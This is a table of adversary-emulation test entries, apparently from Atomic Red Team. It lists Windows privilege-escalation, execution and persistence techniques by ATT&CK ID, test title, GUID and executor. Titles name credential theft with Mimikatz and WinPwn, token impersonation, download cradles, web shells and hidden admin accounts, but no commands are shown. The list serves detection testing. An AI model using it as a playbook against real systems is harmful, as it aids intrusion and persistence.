404 privilege-escalation T1546.008 Event Triggered Execution: Accessibility Features 2 Replace binary of sticky keys 934e90cf-29ca-48b3-863c-411737ad44e3 command_prompt
405 privilege-escalation T1546.008 Event Triggered Execution: Accessibility Features 3 Create Symbolic Link From osk.exe to cmd.exe 51ef369c-5e87-4f33-88cd-6d61be63edf2 command_prompt
406 privilege-escalation T1055.004 Process Injection: Asynchronous Procedure Call 1 Process Injection via C# 611b39b7-e243-4c81-87a4-7145a90358b1 command_prompt
407 privilege-escalation T1546.009 Event Triggered Execution: AppCert DLLs 1 Create registry persistence via AppCert DLL a5ad6104-5bab-4c43-b295-b4c44c7c6b05 powershell
408 privilege-escalation T1134.001 Access Token Manipulation: Token Impersonation/Theft 1 Named pipe client impersonation 90db9e27-8e7c-4c04-b602-a45927884966 powershell
409 privilege-escalation T1134.001 Access Token Manipulation: Token Impersonation/Theft 2 `SeDebugPrivilege` token duplication 34f0a430-9d04-4d98-bcb5-1989f14719f0 powershell
410 privilege-escalation T1134.001 Access Token Manipulation: Token Impersonation/Theft 3 Launch NSudo Executable 7be1bc0f-d8e5-4345-9333-f5f67d742cb9 powershell
411 privilege-escalation T1134.001 Access Token Manipulation: Token Impersonation/Theft 4 Bad Potato 9c6d799b-c111-4749-a42f-ec2f8cb51448 powershell
412 privilege-escalation T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription 1 Persistence via WMI Event Subscription - CommandLineEventConsumer 3c64f177-28e2-49eb-a799-d767b24dd1e0 powershell
413 privilege-escalation T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription 2 Persistence via WMI Event Subscription - ActiveScriptEventConsumer fecd0dfd-fb55-45fa-a10b-6250272d0832 powershell
414 privilege-escalation T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription 3 Windows MOFComp.exe Load MOF File 29786d7e-8916-4de6-9c55-be7b093b2706 powershell
415 privilege-escalation T1134.004 Access Token Manipulation: Parent PID Spoofing 1 Parent PID Spoofing using PowerShell 069258f4-2162-46e9-9a25-c9c6c56150d2 powershell
416 privilege-escalation T1134.004 Access Token Manipulation: Parent PID Spoofing 2 Parent PID Spoofing - Spawn from Current Process 14920ebd-1d61-491a-85e0-fe98efe37f25 powershell
417 privilege-escalation T1134.004 Access Token Manipulation: Parent PID Spoofing 3 Parent PID Spoofing - Spawn from Specified Process cbbff285-9051-444a-9d17-c07cd2d230eb powershell
418 privilege-escalation T1134.004 Access Token Manipulation: Parent PID Spoofing 4 Parent PID Spoofing - Spawn from svchost.exe e9f2b777-3123-430b-805d-5cedc66ab591 powershell
419 privilege-escalation T1134.004 Access Token Manipulation: Parent PID Spoofing 5 Parent PID Spoofing - Spawn from New Process 2988133e-561c-4e42-a15f-6281e6a9b2db powershell
420 privilege-escalation T1546.001 Event Triggered Execution: Change Default File Association 1 Change Default File Association 10a08978-2045-4d62-8c42-1957bbbea102 command_prompt
421 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 1 Reg Key Run e55be3fd-3521-4610-9d1a-e210e42dcf05 command_prompt
422 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 2 Reg Key RunOnce 554cbd88-cde1-4b56-8168-0be552eed9eb command_prompt
423 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 3 PowerShell Registry RunOnce eb44f842-0457-4ddc-9b92-c4caa144ac42 powershell
424 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 4 Suspicious vbs file run from startup Folder 2cb98256-625e-4da9-9d44-f2e5f90b8bd5 powershell
425 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 5 Suspicious jse file run from startup Folder dade9447-791e-4c8f-b04b-3a35855dfa06 powershell
426 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 6 Suspicious bat file run from startup Folder 5b6768e4-44d2-44f0-89da-a01d1430fd5e powershell
427 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 7 Add Executable Shortcut Link to User Startup Folder 24e55612-85f6-4bd6-ae74-a73d02e3441d powershell
428 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 8 Add persistance via Recycle bin bda6a3d6-7aa7-4e89-908b-306772e9662f command_prompt
429 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 9 SystemBC Malware-as-a-Service Registry 9dc7767b-30c1-4cc4-b999-50cab5e27891 powershell
430 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 10 Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value acfef903-7662-447e-a391-9c91c2f00f7b powershell
431 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 11 Change Startup Folder - HKCU Modify User Shell Folders Startup Value 8834b65a-f808-4ece-ad7e-2acdf647aafa powershell
432 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 12 HKCU - Policy Settings Explorer Run Key a70faea1-e206-4f6f-8d9a-67379be8f6f1 powershell
433 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 13 HKLM - Policy Settings Explorer Run Key b5c9a9bc-dda3-4ea0-b16a-add8e81ab75f powershell
434 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 14 HKLM - Append Command to Winlogon Userinit KEY Value f7fab6cc-8ece-4ca7-a0f1-30a22fccd374 powershell
435 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 15 HKLM - Modify default System Shell - Winlogon Shell KEY Value 1d958c61-09c6-4d9e-b26b-4130314e520e powershell
436 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 16 secedit used to create a Run key in the HKLM Hive 14fdc3f1-6fc3-4556-8d36-aa89d9d42d02 command_prompt
437 privilege-escalation T1055.012 Process Injection: Process Hollowing 1 Process Hollowing using PowerShell 562427b4-39ef-4e8c-af88-463a78e70b9c powershell
438 privilege-escalation T1055.012 Process Injection: Process Hollowing 2 RunPE via VBA 3ad4a037-1598-4136-837c-4027e4fa319b powershell
439 privilege-escalation T1546 Event Triggered Execution 1 Persistence with Custom AutodialDLL aca9ae16-7425-4b6d-8c30-cad306fdbd5b powershell
440 privilege-escalation T1546 Event Triggered Execution 2 HKLM - Persistence using CommandProcessor AutoRun key (With Elevation) a574dafe-a903-4cce-9701-14040f4f3532 powershell
441 privilege-escalation T1546 Event Triggered Execution 3 HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation) 36b8dbf9-59b1-4e9b-a3bb-36e80563ef01 powershell
442 privilege-escalation T1134.005 Access Token Manipulation: SID-History Injection 1 Injection SID-History with mimikatz 6bef32e5-9456-4072-8f14-35566fb85401 command_prompt
443 privilege-escalation T1547.002 Authentication Package 1 Authentication Package be2590e8-4ac3-47ac-b4b5-945820f2fbe9 powershell
444 privilege-escalation T1546.015 Event Triggered Execution: Component Object Model Hijacking 1 COM Hijacking - InprocServer32 48117158-d7be-441b-bc6a-d9e36e47b52b powershell
445 privilege-escalation T1546.015 Event Triggered Execution: Component Object Model Hijacking 2 Powershell Execute COM Object 752191b1-7c71-445c-9dbe-21bb031b18eb powershell
446 privilege-escalation T1546.015 Event Triggered Execution: Component Object Model Hijacking 3 COM Hijacking with RunDLL32 (Local Server Switch) 123520cc-e998-471b-a920-bd28e3feafa0 powershell
447 privilege-escalation T1546.015 Event Triggered Execution: Component Object Model Hijacking 4 COM hijacking via TreatAs 33eacead-f117-4863-8eb0-5c6304fbfaa9 powershell
448 privilege-escalation T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path 1 Execution of program.exe as service with unquoted service path 2770dea7-c50f-457b-84c4-c40a47460d9f command_prompt
449 privilege-escalation T1546.010 Event Triggered Execution: AppInit DLLs 1 Install AppInit Shim a58d9386-3080-4242-ab5f-454c16503d18 command_prompt
450 privilege-escalation T1546.002 Event Triggered Execution: Screensaver 1 Set Arbitrary Binary as Screensaver 281201e7-de41-4dc9-b73d-f288938cbb64 command_prompt
451 privilege-escalation T1574.002 Hijack Execution Flow: DLL Side-Loading 1 DLL Side-Loading using the Notepad++ GUP.exe binary 65526037-7079-44a9-bda1-2cb624838040 command_prompt
452 privilege-escalation T1574.002 Hijack Execution Flow: DLL Side-Loading 2 DLL Side-Loading using the dotnet startup hook environment variable d322cdd7-7d60-46e3-9111-648848da7c02 command_prompt
453 privilege-escalation T1037.001 Boot or Logon Initialization Scripts: Logon Script (Windows) 1 Logon Scripts d6042746-07d4-4c92-9ad8-e644c114a231 command_prompt
454 privilege-escalation T1547.008 Boot or Logon Autostart Execution: LSASS Driver 1 Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt 8ecef16d-d289-46b4-917b-0dba6dc81cf1 powershell
455 privilege-escalation T1053.002 Scheduled Task/Job: At 1 At.exe Scheduled task 4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8 command_prompt
456 privilege-escalation T1055.001 Process Injection: Dynamic-link Library Injection 1 Process Injection via mavinject.exe 74496461-11a1-4982-b439-4d87a550d254 powershell
457 privilege-escalation T1055.001 Process Injection: Dynamic-link Library Injection 2 WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique 8b56f787-73d9-4f1d-87e8-d07e89cbc7f5 powershell
458 privilege-escalation T1546.007 Event Triggered Execution: Netsh Helper DLL 1 Netsh Helper DLL Registration 3244697d-5a3a-4dfc-941c-550f69f91a4d command_prompt
459 privilege-escalation T1078.003 Valid Accounts: Local Accounts 1 Create local account with admin privileges a524ce99-86de-4db6-b4f9-e08f35a47a15 command_prompt
460 privilege-escalation T1078.003 Valid Accounts: Local Accounts 3 WinPwn - Loot local Credentials - powerhell kittie 9e9fd066-453d-442f-88c1-ad7911d32912 powershell
461 privilege-escalation T1078.003 Valid Accounts: Local Accounts 4 WinPwn - Loot local Credentials - Safetykatz e9fdb899-a980-4ba4-934b-486ad22e22f4 powershell
462 privilege-escalation T1574.012 Hijack Execution Flow: COR_PROFILER 1 User scope COR_PROFILER 9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a powershell
463 privilege-escalation T1574.012 Hijack Execution Flow: COR_PROFILER 2 System Scope COR_PROFILER f373b482-48c8-4ce4-85ed-d40c8b3f7310 powershell
464 privilege-escalation T1574.012 Hijack Execution Flow: COR_PROFILER 3 Registry-free process scope COR_PROFILER 79d57242-bbef-41db-b301-9d01d9f6e817 powershell
465 execution T1053.005 Scheduled Task/Job: Scheduled Task 1 Scheduled Task Startup Script fec27f65-db86-4c2d-b66c-61945aee87c2 command_prompt
466 execution T1053.005 Scheduled Task/Job: Scheduled Task 2 Scheduled task Local 42f53695-ad4a-4546-abb6-7d837f644a71 command_prompt
467 execution T1053.005 Scheduled Task/Job: Scheduled Task 3 Scheduled task Remote 2e5eac3e-327b-4a88-a0c0-c4057039a8dd command_prompt
468 execution T1053.005 Scheduled Task/Job: Scheduled Task 4 Powershell Cmdlet Scheduled Task af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd powershell
469 execution T1053.005 Scheduled Task/Job: Scheduled Task 5 Task Scheduler via VBA ecd3fa21-7792-41a2-8726-2c5c673414d3 powershell
470 execution T1053.005 Scheduled Task/Job: Scheduled Task 6 WMI Invoke-CimMethod Scheduled Task e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b powershell
471 execution T1053.005 Scheduled Task/Job: Scheduled Task 7 Scheduled Task Executing Base64 Encoded Commands From Registry e895677d-4f06-49ab-91b6-ae3742d0a2ba command_prompt
472 execution T1053.005 Scheduled Task/Job: Scheduled Task 8 Import XML Schedule Task with Hidden Attribute cd925593-fbb4-486d-8def-16cbdf944bf4 powershell
473 execution T1053.005 Scheduled Task/Job: Scheduled Task 9 PowerShell Modify A Scheduled Task dda6fc7b-c9a6-4c18-b98d-95ec6542af6d powershell
474 execution T1047 Windows Management Instrumentation 1 WMI Reconnaissance Users c107778c-dcf5-47c5-af2e-1d058a3df3ea command_prompt
475 execution T1047 Windows Management Instrumentation 2 WMI Reconnaissance Processes 5750aa16-0e59-4410-8b9a-8a47ca2788e2 command_prompt
476 execution T1047 Windows Management Instrumentation 3 WMI Reconnaissance Software 718aebaa-d0e0-471a-8241-c5afa69c7414 command_prompt
477 execution T1047 Windows Management Instrumentation 4 WMI Reconnaissance List Remote Services 0fd48ef7-d890-4e93-a533-f7dedd5191d3 command_prompt
478 execution T1047 Windows Management Instrumentation 5 WMI Execute Local Process b3bdfc91-b33e-4c6d-a5c8-d64bee0276b3 command_prompt
479 execution T1047 Windows Management Instrumentation 6 WMI Execute Remote Process 9c8ef159-c666-472f-9874-90c8d60d136b command_prompt
480 execution T1047 Windows Management Instrumentation 7 Create a Process using WMI Query and an Encoded Command 7db7a7f9-9531-4840-9b30-46220135441c command_prompt
481 execution T1047 Windows Management Instrumentation 8 Create a Process using obfuscated Win32_Process 10447c83-fc38-462a-a936-5102363b1c43 powershell
482 execution T1047 Windows Management Instrumentation 9 WMI Execute rundll32 00738d2a-4651-4d76-adf2-c43a41dfb243 powershell
483 execution T1047 Windows Management Instrumentation 10 Application uninstall using WMIC c510d25b-1667-467d-8331-a56d3e9bc4ff command_prompt
484 execution T1559.002 Inter-Process Communication: Dynamic Data Exchange 1 Execute Commands f592ba2a-e9e8-4d62-a459-ef63abd819fd manual
485 execution T1559.002 Inter-Process Communication: Dynamic Data Exchange 2 Execute PowerShell script via Word DDE 47c21fb6-085e-4b0d-b4d2-26d72c3830b3 command_prompt
486 execution T1559.002 Inter-Process Communication: Dynamic Data Exchange 3 DDEAUTO cf91174c-4e74-414e-bec0-8d60a104d181 manual
487 execution T1204.002 User Execution: Malicious File 1 OSTap Style Macro Execution 8bebc690-18c7-4549-bc98-210f7019efff powershell
488 execution T1204.002 User Execution: Malicious File 2 OSTap Payload Download 3f3af983-118a-4fa1-85d3-ba4daa739d80 command_prompt
489 execution T1204.002 User Execution: Malicious File 3 Maldoc choice flags command execution 0330a5d2-a45a-4272-a9ee-e364411c4b18 powershell
490 execution T1204.002 User Execution: Malicious File 4 OSTAP JS version add560ef-20d6-4011-a937-2c340f930911 powershell
491 execution T1204.002 User Execution: Malicious File 5 Office launching .bat file from AppData 9215ea92-1ded-41b7-9cd6-79f9a78397aa powershell
492 execution T1204.002 User Execution: Malicious File 6 Excel 4 Macro 4ea1fc97-8a46-4b4e-ba48-af43d2a98052 powershell
493 execution T1204.002 User Execution: Malicious File 7 Headless Chrome code execution via VBA a19ee671-ed98-4e9d-b19c-d1954a51585a powershell
494 execution T1204.002 User Execution: Malicious File 8 Potentially Unwanted Applications (PUA) 02f35d62-9fdc-4a97-b899-a5d9a876d295 powershell
495 execution T1204.002 User Execution: Malicious File 9 Office Generic Payload Download 5202ee05-c420-4148-bf5e-fd7f7d24850c powershell
496 execution T1204.002 User Execution: Malicious File 10 LNK Payload Download 581d7521-9c4b-420e-9695-2aec5241167f powershell
497 execution T1204.002 User Execution: Malicious File 11 Mirror Blast Emulation 24fd9719-7419-42dd-bce6-ab3463110b3c powershell
498 execution T1106 Native API 1 Execution through API - CreateProcess 99be2089-c52d-4a4a-b5c3-261ee42c8b62 command_prompt
499 execution T1106 Native API 2 WinPwn - Get SYSTEM shell - Pop System Shell using CreateProcess technique ce4e76e6-de70-4392-9efe-b281fc2b4087 powershell
500 execution T1106 Native API 3 WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique 7ec5b74e-8289-4ff2-a162-b6f286a33abd powershell
501 execution T1106 Native API 4 WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique e1f93a06-1649-4f07-89a8-f57279a7d60e powershell
502 execution T1072 Software Deployment Tools 1 Radmin Viewer Utility b4988cad-6ed2-434d-ace5-ea2670782129 command_prompt
503 execution T1072 Software Deployment Tools 2 PDQ Deploy RAT e447b83b-a698-4feb-bed1-a7aaf45c3443 command_prompt
504 execution T1059.001 Command and Scripting Interpreter: PowerShell 1 Mimikatz f3132740-55bc-48c4-bcc0-758a459cd027 command_prompt
505 execution T1059.001 Command and Scripting Interpreter: PowerShell 2 Run BloodHound from local disk a21bb23e-e677-4ee7-af90-6931b57b6350 powershell
506 execution T1059.001 Command and Scripting Interpreter: PowerShell 3 Run Bloodhound from Memory using Download Cradle bf8c1441-4674-4dab-8e4e-39d93d08f9b7 powershell
507 execution T1059.001 Command and Scripting Interpreter: PowerShell 4 Obfuscation Tests 4297c41a-8168-4138-972d-01f3ee92c804 powershell
508 execution T1059.001 Command and Scripting Interpreter: PowerShell 5 Mimikatz - Cradlecraft PsSendKeys af1800cf-9f9d-4fd1-a709-14b1e6de020d powershell
509 execution T1059.001 Command and Scripting Interpreter: PowerShell 6 Invoke-AppPathBypass 06a220b6-7e29-4bd8-9d07-5b4d86742372 command_prompt
510 execution T1059.001 Command and Scripting Interpreter: PowerShell 7 Powershell MsXml COM object - with prompt 388a7340-dbc1-4c9d-8e59-b75ad8c6d5da command_prompt
511 execution T1059.001 Command and Scripting Interpreter: PowerShell 8 Powershell XML requests 4396927f-e503-427b-b023-31049b9b09a6 command_prompt
512 execution T1059.001 Command and Scripting Interpreter: PowerShell 9 Powershell invoke mshta.exe download 8a2ad40b-12c7-4b25-8521-2737b0a415af command_prompt
513 execution T1059.001 Command and Scripting Interpreter: PowerShell 10 Powershell Invoke-DownloadCradle cc50fa2a-a4be-42af-a88f-e347ba0bf4d7 manual
514 execution T1059.001 Command and Scripting Interpreter: PowerShell 11 PowerShell Fileless Script Execution fa050f5e-bc75-4230-af73-b6fd7852cd73 powershell
515 execution T1059.001 Command and Scripting Interpreter: PowerShell 12 PowerShell Downgrade Attack 9148e7c4-9356-420e-a416-e896e9c0f73e powershell
516 execution T1059.001 Command and Scripting Interpreter: PowerShell 13 NTFS Alternate Data Stream Access 8e5c5532-1181-4c1d-bb79-b3a9f5dbd680 powershell
517 execution T1059.001 Command and Scripting Interpreter: PowerShell 14 PowerShell Session Creation and Use 7c1acec2-78fa-4305-a3e0-db2a54cddecd powershell
518 execution T1059.001 Command and Scripting Interpreter: PowerShell 15 ATHPowerShellCommandLineParameter -Command parameter variations 686a9785-f99b-41d4-90df-66ed515f81d7 powershell
519 execution T1059.001 Command and Scripting Interpreter: PowerShell 16 ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments 1c0a870f-dc74-49cf-9afc-eccc45e58790 powershell
520 execution T1059.001 Command and Scripting Interpreter: PowerShell 17 ATHPowerShellCommandLineParameter -EncodedCommand parameter variations 86a43bad-12e3-4e85-b97c-4d5cf25b95c3 powershell
521 execution T1059.001 Command and Scripting Interpreter: PowerShell 18 ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments 0d181431-ddf3-4826-8055-2dbf63ae848b powershell
522 execution T1059.001 Command and Scripting Interpreter: PowerShell 19 PowerShell Command Execution a538de64-1c74-46ed-aa60-b995ed302598 command_prompt
523 execution T1059.001 Command and Scripting Interpreter: PowerShell 20 PowerShell Invoke Known Malicious Cmdlets 49eb9404-5e0f-4031-a179-b40f7be385e3 powershell
524 execution T1059.001 Command and Scripting Interpreter: PowerShell 21 PowerUp Invoke-AllChecks 1289f78d-22d2-4590-ac76-166737e1811b powershell
525 execution T1059.001 Command and Scripting Interpreter: PowerShell 22 Abuse Nslookup with DNS Records 999bff6d-dc15-44c9-9f5c-e1051bfc86e1 powershell
526 execution T1059.003 Command and Scripting Interpreter: Windows Command Shell 1 Create and Execute Batch Script 9e8894c0-50bd-4525-a96c-d4ac78ece388 powershell
527 execution T1059.003 Command and Scripting Interpreter: Windows Command Shell 2 Writes text to a file and displays it. 127b4afe-2346-4192-815c-69042bec570e command_prompt
528 execution T1059.003 Command and Scripting Interpreter: Windows Command Shell 3 Suspicious Execution via Windows Command Shell d0eb3597-a1b3-4d65-b33b-2cda8d397f20 command_prompt
529 execution T1059.003 Command and Scripting Interpreter: Windows Command Shell 4 Simulate BlackByte Ransomware Print Bombing 6b2903ac-8f36-450d-9ad5-b220e8a2dcb9 powershell
530 execution T1059.003 Command and Scripting Interpreter: Windows Command Shell 5 Command Prompt read contents from CMD file and execute df81db1b-066c-4802-9bc8-b6d030c3ba8e command_prompt
531 execution T1059.005 Command and Scripting Interpreter: Visual Basic 1 Visual Basic script execution to gather local computer information 1620de42-160a-4fe5-bbaf-d3fef0181ce9 powershell
532 execution T1059.005 Command and Scripting Interpreter: Visual Basic 2 Encoded VBS code execution e8209d5f-e42d-45e6-9c2f-633ac4f1eefa powershell
533 execution T1059.005 Command and Scripting Interpreter: Visual Basic 3 Extract Memory via VBA 8faff437-a114-4547-9a60-749652a03df6 powershell
534 execution T1569.002 System Services: Service Execution 1 Execute a Command as a Service 2382dee2-a75f-49aa-9378-f52df6ed3fb1 command_prompt
535 execution T1569.002 System Services: Service Execution 2 Use PsExec to execute a command on a remote host 873106b7-cfed-454b-8680-fa9f6400431c command_prompt
536 execution T1569.002 System Services: Service Execution 4 BlackCat pre-encryption cmds with Lateral Movement 31eb7828-97d7-4067-9c1e-c6feb85edc4b powershell
537 execution T1053.002 Scheduled Task/Job: At 1 At.exe Scheduled task 4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8 command_prompt
538 persistence T1053.005 Scheduled Task/Job: Scheduled Task 1 Scheduled Task Startup Script fec27f65-db86-4c2d-b66c-61945aee87c2 command_prompt
539 persistence T1053.005 Scheduled Task/Job: Scheduled Task 2 Scheduled task Local 42f53695-ad4a-4546-abb6-7d837f644a71 command_prompt
540 persistence T1053.005 Scheduled Task/Job: Scheduled Task 3 Scheduled task Remote 2e5eac3e-327b-4a88-a0c0-c4057039a8dd command_prompt
541 persistence T1053.005 Scheduled Task/Job: Scheduled Task 4 Powershell Cmdlet Scheduled Task af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd powershell
542 persistence T1053.005 Scheduled Task/Job: Scheduled Task 5 Task Scheduler via VBA ecd3fa21-7792-41a2-8726-2c5c673414d3 powershell
543 persistence T1053.005 Scheduled Task/Job: Scheduled Task 6 WMI Invoke-CimMethod Scheduled Task e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b powershell
544 persistence T1053.005 Scheduled Task/Job: Scheduled Task 7 Scheduled Task Executing Base64 Encoded Commands From Registry e895677d-4f06-49ab-91b6-ae3742d0a2ba command_prompt
545 persistence T1053.005 Scheduled Task/Job: Scheduled Task 8 Import XML Schedule Task with Hidden Attribute cd925593-fbb4-486d-8def-16cbdf944bf4 powershell
546 persistence T1053.005 Scheduled Task/Job: Scheduled Task 9 PowerShell Modify A Scheduled Task dda6fc7b-c9a6-4c18-b98d-95ec6542af6d powershell
547 persistence T1546.013 Event Triggered Execution: PowerShell Profile 1 Append malicious start-process cmdlet 090e5aa5-32b6-473b-a49b-21e843a56896 powershell
548 persistence T1133 External Remote Services 1 Running Chrome VPN Extensions via the Registry 2 vpn extension 4c8db261-a58b-42a6-a866-0a294deedde4 powershell
549 persistence T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness 1 Service Registry Permissions Weakness f7536d63-7fd4-466f-89da-7e48d550752a powershell
550 persistence T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness 2 Service ImagePath Change with reg.exe f38e9eea-e1d7-4ba6-b716-584791963827 command_prompt
551 persistence T1547 Boot or Logon Autostart Execution 1 Add a driver cb01b3da-b0e7-4e24-bf6d-de5223526785 command_prompt
552 persistence T1547.014 Active Setup 1 HKLM - Add atomic_test key to launch executable as part of user setup deff4586-0517-49c2-981d-bbea24d48d71 powershell
553 persistence T1547.014 Active Setup 2 HKLM - Add malicious StubPath value to existing Active Setup Entry 39e417dd-4fed-4d9c-ae3a-ba433b4d0e9a powershell
554 persistence T1547.014 Active Setup 3 HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number 04d55cef-f283-40ba-ae2a-316bc3b5e78c powershell
555 persistence T1543.003 Create or Modify System Process: Windows Service 1 Modify Fax service to run PowerShell ed366cde-7d12-49df-a833-671904770b9f command_prompt
556 persistence T1543.003 Create or Modify System Process: Windows Service 2 Service Installation CMD 981e2942-e433-44e9-afc1-8c957a1496b6 command_prompt
557 persistence T1543.003 Create or Modify System Process: Windows Service 3 Service Installation PowerShell 491a4af6-a521-4b74-b23b-f7b3f1ee9e77 powershell
558 persistence T1543.003 Create or Modify System Process: Windows Service 4 TinyTurla backdoor service w64time ef0581fd-528e-4662-87bc-4c2affb86940 command_prompt
559 persistence T1137 Office Application Startup 1 Office Application Startup - Outlook as a C2 bfe6ac15-c50b-4c4f-a186-0fc6b8ba936c command_prompt
560 persistence T1574.001 Hijack Execution Flow: DLL Search Order Hijacking 1 DLL Search Order Hijacking - amsi.dll 8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3 command_prompt
561 persistence T1137.006 Office Application Startup: Add-ins 1 Code Executed Via Excel Add-in File (Xll) 441b1a0f-a771-428a-8af0-e99e4698cda3 powershell
562 persistence T1505.002 Server Software Component: Transport Agent 1 Install MS Exchange Transport Agent Persistence 43e92449-ff60-46e9-83a3-1a38089df94d powershell
563 persistence T1556.002 Modify Authentication Process: Password Filter DLL 1 Install and Register Password Filter DLL a7961770-beb5-4134-9674-83d7e1fa865c powershell
564 persistence T1176 Browser Extensions 1 Chrome (Developer Mode) 3ecd790d-2617-4abf-9a8c-4e8d47da9ee1 manual
565 persistence T1176 Browser Extensions 2 Chrome (Chrome Web Store) 4c83940d-8ca5-4bb2-8100-f46dc914bc3f manual
566 persistence T1176 Browser Extensions 3 Firefox cb790029-17e6-4c43-b96f-002ce5f10938 manual
567 persistence T1176 Browser Extensions 4 Edge Chromium Addon - VPN 3d456e2b-a7db-4af8-b5b3-720e7c4d9da5 manual
568 persistence T1546.011 Event Triggered Execution: Application Shimming 1 Application Shim Installation 9ab27e22-ee62-4211-962b-d36d9a0e6a18 command_prompt
569 persistence T1546.011 Event Triggered Execution: Application Shimming 2 New shim database files created in the default shim database directory aefd6866-d753-431f-a7a4-215ca7e3f13d powershell
570 persistence T1546.011 Event Triggered Execution: Application Shimming 3 Registry key creation and/or modification events for SDB 9b6a06f9-ab5e-4e8d-8289-1df4289db02f powershell
571 persistence T1547.010 Boot or Logon Autostart Execution: Port Monitors 1 Add Port Monitor persistence in Registry d34ef297-f178-4462-871e-9ce618d44e50 command_prompt
572 persistence T1547.009 Boot or Logon Autostart Execution: Shortcut Modification 1 Shortcut Modification ce4fc678-364f-4282-af16-2fb4c78005ce command_prompt
573 persistence T1547.009 Boot or Logon Autostart Execution: Shortcut Modification 2 Create shortcut to cmd in startup folders cfdc954d-4bb0-4027-875b-a1893ce406f2 powershell
574 persistence T1547.005 Boot or Logon Autostart Execution: Security Support Provider 1 Modify SSP configuration in registry afdfd7e3-8a0b-409f-85f7-886fdf249c9e powershell
575 persistence T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking 1 powerShell Persistence via hijacking default modules - Get-Variable.exe 1561de08-0b4b-498e-8261-e922f3494aae powershell
576 persistence T1505.003 Server Software Component: Web Shell 1 Web Shell Written to Disk 0a2ce662-1efa-496f-a472-2fe7b080db16 command_prompt
577 persistence T1078.001 Valid Accounts: Default Accounts 1 Enable Guest account with RDP capability and admin privileges 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 command_prompt
578 persistence T1078.001 Valid Accounts: Default Accounts 2 Activate Guest Account aa6cb8c4-b582-4f8e-b677-37733914abda command_prompt
579 persistence T1547.003 Time Providers 1 Create a new time provider df1efab7-bc6d-4b88-8be9-91f55ae017aa powershell
580 persistence T1547.003 Time Providers 2 Edit an existing time provider 29e0afca-8d1d-471a-8d34-25512fc48315 powershell
581 persistence T1136.001 Create Account: Local Account 3 Create a new user in a command prompt 6657864e-0323-4206-9344-ac9cd7265a4f command_prompt
582 persistence T1136.001 Create Account: Local Account 4 Create a new user in PowerShell bc8be0ac-475c-4fbf-9b1d-9fffd77afbde powershell
583 persistence T1136.001 Create Account: Local Account 6 Create a new Windows admin user fda74566-a604-4581-a4cc-fbbe21d66559 command_prompt
584 persistence T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL 1 Winlogon Shell Key Persistence - PowerShell bf9f9d65-ee4d-4c3e-a843-777d04f19c38 powershell
585 persistence T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL 2 Winlogon Userinit Key Persistence - PowerShell fb32c935-ee2e-454b-8fa3-1c46b42e8dfb powershell
586 persistence T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL 3 Winlogon Notify Key Logon Persistence - PowerShell d40da266-e073-4e5a-bb8b-2b385023e5f9 powershell
587 persistence T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL 4 Winlogon HKLM Shell Key Persistence - PowerShell 95a3c42f-8c88-4952-ad60-13b81d929a9d powershell
588 persistence T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL 5 Winlogon HKLM Userinit Key Persistence - PowerShell f9b8daff-8fa7-4e6a-a1a7-7c14675a545b powershell
589 persistence T1546.012 Event Triggered Execution: Image File Execution Options Injection 1 IFEO Add Debugger fdda2626-5234-4c90-b163-60849a24c0b8 command_prompt
590 persistence T1546.012 Event Triggered Execution: Image File Execution Options Injection 2 IFEO Global Flags 46b1f278-c8ee-4aa5-acce-65e77b11f3c1 command_prompt
591 persistence T1546.012 Event Triggered Execution: Image File Execution Options Injection 3 GlobalFlags in Image File Execution Options 13117939-c9b2-4a43-999e-0a543df92f0d powershell
